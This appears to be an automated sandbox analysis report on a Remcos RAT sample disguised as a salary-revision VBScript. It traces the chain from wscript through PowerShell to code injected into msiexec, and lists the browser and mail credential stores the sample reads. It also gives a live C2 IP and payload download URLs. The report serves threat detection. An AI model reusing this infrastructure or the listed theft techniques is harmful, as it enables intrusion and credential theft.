Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_20902264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 7_2_20902264
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 12_2_004082CD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0041739B GetVersionExW, 11_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: ESMTPPassword 12_2_004033F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword 12_2_00402DB3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword 12_2_00402DB3
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 6648, type: MEMORYSTR

Remote Access Functionality
barindex
Detected Remcos RAT
Source: C:\Windows\SysWOW64\msiexec.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-AOD6MB Jump to behavior
Yara detected Remcos RAT
Source: Yara match File source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538691 Sample: Salary Revision_pdf.vbs Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 32 sf4l.shop 2->32 34 geoplugin.net 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 10 other signatures 2->48 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 52 Early bird code injection technique detected 8->52 54 Writes to foreign memory regions 8->54 56 Found suspicious powershell code related to unpacking or dynamic code loading 8->56 58 Queues an APC in another process (thread injection) 8->58 13 msiexec.exe 3 13 8->13         started        17 conhost.exe 8->17         started        60 VBScript performs obfuscated calls to suspicious functions 11->60 62 Suspicious powershell command line found 11->62 64 Wscript starts Powershell (via cmd or directly) 11->64 66 2 other signatures 11->66 19 powershell.exe 14 18 11->19         started        process6 dnsIp7 36 154.216.18.214, 2404, 49960, 49971 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 13->36 38 geoplugin.net 178.237.33.50, 49972, 80 ATOM86-ASATOM86NL Netherlands 13->38 68 Detected Remcos RAT 13->68 70 Tries to steal Mail credentials (via file registry) 13->70 72 Maps a DLL or memory area into another process 13->72 21 msiexec.exe 2 13->21         started        24 msiexec.exe 1 13->24         started        26 msiexec.exe 1 13->26         started        28 msiexec.exe 13->28         started        40 sf4l.shop 188.114.97.3, 443, 49746, 49930 CLOUDFLARENETUS European Union 19->40 74 Found suspicious powershell code related to unpacking or dynamic code loading 19->74 30 conhost.exe 19->30         started        signatures8 process9 signatures10 50 Tries to harvest and steal browser information (history, passwords, etc) 21->50
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.114.97.3
 sf4l.shop European Union
13335 CLOUDFLARENETUS false
154.216.18.214
 unknown Seychelles
135357 SKHT-ASShenzhenKatherineHengTechnologyInformationCo true
178.237.33.50
 geoplugin.net Netherlands
8455 ATOM86-ASATOM86NL false

Contacted Domains

Name IP Active
geoplugin.net 178.237.33.50 true
sf4l.shop 188.114.97.3 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://geoplugin.net/json.gp false
  • URL Reputation: safe
 unknown
https://sf4l.shop/znUvwLfo/XAManxzmrlwVYAnDZ78.bin false
    		unknown
    https://sf4l.shop/zWAbmrmP/Diwani.pfb false
      		unknown